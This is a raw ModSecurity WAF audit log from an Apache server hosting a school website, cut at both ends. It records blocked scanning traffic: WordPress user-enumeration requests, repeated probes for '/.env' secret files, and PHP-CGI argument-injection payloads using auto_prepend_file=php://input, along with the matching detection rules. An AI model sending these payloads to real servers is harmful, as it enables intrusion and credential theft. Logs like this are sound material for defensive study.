smkn22-jkt.sch.id X-Real-IP: 213.134.39.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.134.39.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --84080413-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84080413-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745644665948829 2470 (- - -) Stopwatch2: 1745644665948829 2470; combined=1417, p1=438, p2=945, p3=0, p4=0, p5=34, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84080413-Z-- --a7a3fd41-A-- [26/Apr/2025:12:50:49 +0700] aAx0OdDEbIDiBZnoTx5M5AAAAFA 103.236.140.4 59448 103.236.140.4 8181 --a7a3fd41-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.58.24.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.58.24.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a7a3fd41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7a3fd41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745646649893881 2865 (- - -) Stopwatch2: 1745646649893881 2865; combined=1526, p1=467, p2=1016, p3=0, p4=0, p5=42, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7a3fd41-Z-- --9bafbf7d-A-- [26/Apr/2025:12:53:56 +0700] aAx09NDEbIDiBZnoTx5NKQAAAEE 103.236.140.4 60218 103.236.140.4 8181 --9bafbf7d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --9bafbf7d-C-- --9bafbf7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bafbf7d-E-- --9bafbf7d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745646836387890 5326 (- - -) Stopwatch2: 1745646836387890 5326; combined=3425, p1=597, p2=2787, p3=0, p4=0, p5=41, sr=96, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bafbf7d-Z-- --85a8c57e-A-- [26/Apr/2025:14:41:55 +0700] aAyOQ9DEbIDiBZnoTx5TxgAAAEc 103.236.140.4 57106 103.236.140.4 8181 --85a8c57e-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 146.190.63.248 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 146.190.63.248 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --85a8c57e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85a8c57e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745653315141751 901 (- - -) Stopwatch2: 1745653315141751 901; combined=291, p1=257, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85a8c57e-Z-- --909e456a-A-- [26/Apr/2025:15:14:05 +0700] aAyVzXGCMLWH05JCdxwqlgAAAJg 103.236.140.4 36442 103.236.140.4 8181 --909e456a-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 207.154.197.113 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 207.154.197.113 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --909e456a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --909e456a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745655245090814 799 (- - -) Stopwatch2: 1745655245090814 799; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --909e456a-Z-- --c94d790b-A-- [26/Apr/2025:15:58:15 +0700] aAygJ9DEbIDiBZnoTx5YSgAAAEs 103.236.140.4 46504 103.236.140.4 8181 --c94d790b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.4.63 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.4.63 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c94d790b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c94d790b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745657895923778 766 (- - -) Stopwatch2: 1745657895923778 766; combined=336, p1=287, p2=0, p3=0, p4=0, p5=49, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c94d790b-Z-- --a4aefe15-A-- [26/Apr/2025:16:08:41 +0700] aAyimdDEbIDiBZnoTx5Y2QAAAE8 103.236.140.4 48954 103.236.140.4 8181 --a4aefe15-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.81.12.187 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a4aefe15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4aefe15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745658521120901 830 (- - -) Stopwatch2: 1745658521120901 830; combined=323, p1=289, p2=0, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4aefe15-Z-- --29ae5a06-A-- [26/Apr/2025:16:18:14 +0700] aAyk1nGCMLWH05JCdxwurAAAAIA 103.236.140.4 51268 103.236.140.4 8181 --29ae5a06-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 AOL/11.0 AOLBUILD/11.0.1305 Safari/537.36 Accept-Charset: utf-8 --29ae5a06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29ae5a06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745659094980842 12905 (- - -) Stopwatch2: 1745659094980842 12905; combined=24503, p1=277, p2=0, p3=0, p4=0, p5=12134, sr=74, sw=0, l=0, gc=12092 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29ae5a06-Z-- --5c120458-A-- [26/Apr/2025:16:23:01 +0700] aAyl9XGCMLWH05JCdxwu4AAAAJM 103.236.140.4 52366 103.236.140.4 8181 --5c120458-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3829.0 Safari/537.36 Edg/77.0.197.1 Accept-Charset: utf-8 --5c120458-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c120458-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745659381779575 766 (- - -) Stopwatch2: 1745659381779575 766; combined=327, p1=286, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c120458-Z-- --f99f4b4f-A-- [26/Apr/2025:16:23:08 +0700] aAyl_HGCMLWH05JCdxwu5QAAAII 103.236.140.4 52396 103.236.140.4 8181 --f99f4b4f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24 Accept-Charset: utf-8 --f99f4b4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f99f4b4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745659388681350 768 (- - -) Stopwatch2: 1745659388681350 768; combined=319, p1=281, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f99f4b4f-Z-- --301ebd52-A-- [26/Apr/2025:16:53:39 +0700] aAytI3GCMLWH05JCdxwwsQAAAIQ 103.236.140.4 59542 103.236.140.4 8181 --301ebd52-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --301ebd52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --301ebd52-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745661219707000 946 (- - -) Stopwatch2: 1745661219707000 946; combined=420, p1=375, p2=0, p3=0, p4=0, p5=44, sr=150, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --301ebd52-Z-- --e398b455-A-- [26/Apr/2025:17:50:48 +0700] aAy6iHGCMLWH05JCdxwzigAAAJc 103.236.140.4 44566 103.236.140.4 8181 --e398b455-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931 Accept-Charset: utf-8 --e398b455-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e398b455-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745664648301756 799 (- - -) Stopwatch2: 1745664648301756 799; combined=377, p1=322, p2=0, p3=0, p4=0, p5=55, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e398b455-Z-- --872e4e65-A-- [26/Apr/2025:17:54:41 +0700] aAy7cXGCMLWH05JCdxwzuwAAAIE 103.236.140.4 45454 103.236.140.4 8181 --872e4e65-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.144.212.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.144.212.193 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --872e4e65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --872e4e65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745664881929929 716 (- - -) Stopwatch2: 1745664881929929 716; combined=258, p1=225, p2=0, p3=0, p4=0, p5=32, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --872e4e65-Z-- --3666a176-A-- [26/Apr/2025:18:04:12 +0700] aAy9rNDEbIDiBZnoTx5fnwAAAFg 103.236.140.4 47780 103.236.140.4 8181 --3666a176-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15 Accept-Charset: utf-8 --3666a176-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3666a176-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745665452486202 891 (- - -) Stopwatch2: 1745665452486202 891; combined=349, p1=308, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3666a176-Z-- --b150ce12-A-- [26/Apr/2025:18:04:56 +0700] aAy92E3IXD9XJ6lrmIX_owAAABM 103.236.140.4 47952 103.236.140.4 8181 --b150ce12-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1) Accept-Charset: utf-8 --b150ce12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b150ce12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745665496357436 791 (- - -) Stopwatch2: 1745665496357436 791; combined=298, p1=262, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b150ce12-Z-- --da729150-A-- [26/Apr/2025:18:10:15 +0700] aAy_F3GCMLWH05JCdxw0QAAAAJg 103.236.140.4 49162 103.236.140.4 8181 --da729150-B-- POST /?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 112.215.146.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 112.215.146.98 X-Forwarded-Proto: https Connection: close Content-Length: 36 User-Agent: python-requests/2.28.2 Accept: */* --da729150-C-- ;echo 1337; die; --da729150-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da729150-E-- --da729150-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||smkn22-jkt.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 -d auto_prepend_file=php://input: \xadd allow_url_include=1 -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745665815171468 3958 (- - -) Stopwatch2: 1745665815171468 3958; combined=2350, p1=445, p2=1872, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da729150-Z-- --76b93e40-A-- [26/Apr/2025:18:16:31 +0700] aAzAj9Q6lpQjDvc0F_PF8QAAAMc 103.236.140.4 50636 103.236.140.4 8181 --76b93e40-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 128.199.182.152 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 128.199.182.152 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --76b93e40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76b93e40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745666191242845 779 (- - -) Stopwatch2: 1745666191242845 779; combined=308, p1=271, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76b93e40-Z-- --4b073c35-A-- [26/Apr/2025:18:26:42 +0700] aAzC8k3IXD9XJ6lrmIUBLgAAABU 103.236.140.4 52972 103.236.140.4 8181 --4b073c35-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Accept-Charset: utf-8 --4b073c35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b073c35-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745666802891681 953 (- - -) Stopwatch2: 1745666802891681 953; combined=428, p1=384, p2=0, p3=0, p4=0, p5=43, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b073c35-Z-- --dd801227-A-- [26/Apr/2025:18:38:53 +0700] aAzFzdDEbIDiBZnoTx5g5AAAAFc 103.236.140.4 55784 103.236.140.4 8181 --dd801227-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 206.189.233.36 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 206.189.233.36 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --dd801227-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd801227-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745667533328921 871 (- - -) Stopwatch2: 1745667533328921 871; combined=382, p1=345, p2=0, p3=0, p4=0, p5=37, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
